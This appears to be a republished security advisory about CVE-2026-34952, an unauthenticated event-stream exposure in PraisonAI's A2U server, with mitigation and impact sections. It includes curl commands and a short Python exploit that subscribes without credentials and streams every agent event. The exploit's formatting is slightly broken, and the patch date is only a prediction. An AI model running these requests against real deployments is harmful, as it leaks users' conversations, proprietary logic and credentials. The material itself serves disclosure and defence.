PraisonAI, Authentication Bypass, CVE-2026-34952 (Critical)

Listen to this Post

The vulnerability exists in the A2U (Agent-to-User) event stream server component of PraisonAI, which is separate from the gateway server. The `create_a2u_routes()` function registers multiple endpoints without any authentication checks. An unauthenticated attacker first sends a POST request to /a2u/subscribe, which returns a `subscription_id` and stream URL. Then the attacker accesses `/a2u/events/sub/{subscription_id}` to receive a live Server-Sent Events (SSE) stream containing all agent activity. Additionally, `/a2u/info` exposes server metadata and event types, while `/a2u/health` reveals subscription counts. No tokens, API keys, or session validation are enforced on any of these routes. The attacker can thus monitor agent responses, internal reasoning chains, tool call arguments, and thinking steps in real time. This leaks sensitive data including user interactions, proprietary logic, and potentially credentials passed to tools. The flaw stems from missing middleware enforcement on the A2U routes, contrasting with the gateway server that was patched in a related fix.
Platform: PraisonAI
Version: All prior to patch (fixed in gateway but A2U separate)
Vulnerability : Unauthenticated event stream exposure
Severity: Critical
date: 2026-04-09 (based on CVE-2026-34952 disclosure)

Prediction: Patch expected 2026-04-16 (within 7 days)

What Undercode Say:

Check if A2U endpoint is exposed
curl -X GET http://target:8000/a2u/info
Subscribe to event stream (no auth)
curl -X POST http://target:8000/a2u/subscribe -H "Content-Type: application/json"
Use returned subscription_id to stream all agent events
curl -N http://target:8000/a2u/events/sub/{subscription_id}
Enumerate health to confirm active subscriptions
curl http://target:8000/a2u/health

Exploit:

import requests, sseclient
base = "http://target:8000"
sub = requests.post(f"{base}/a2u/subscribe").json()
sub_id = sub["subscription_id"]
print(f"Subscribed: {sub_id}")
stream = sseclient.SSEClient(requests.get(f"{base}/a2u/events/sub/{sub_id}", stream=True))
for event in stream.events():
print(event.data) Contains agent responses, tool calls, thinking

Protection:

  • Implement authentication middleware for all `/a2u/` routes (e.g., JWT or API key).
  • Restrict network access to A2U server (firewall/internal network only).
  • Upgrade PraisonAI to version that separates A2U behind gateway auth.
  • Disable A2U component if not needed.

Impact:

  • Full real-time exposure of all agent conversations, internal reasoning, tool arguments, and responses to any network attacker.
  • Leakage of sensitive data, proprietary workflows, and potential credentials passed to tools.
  • Complete loss of confidentiality for agent operations.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top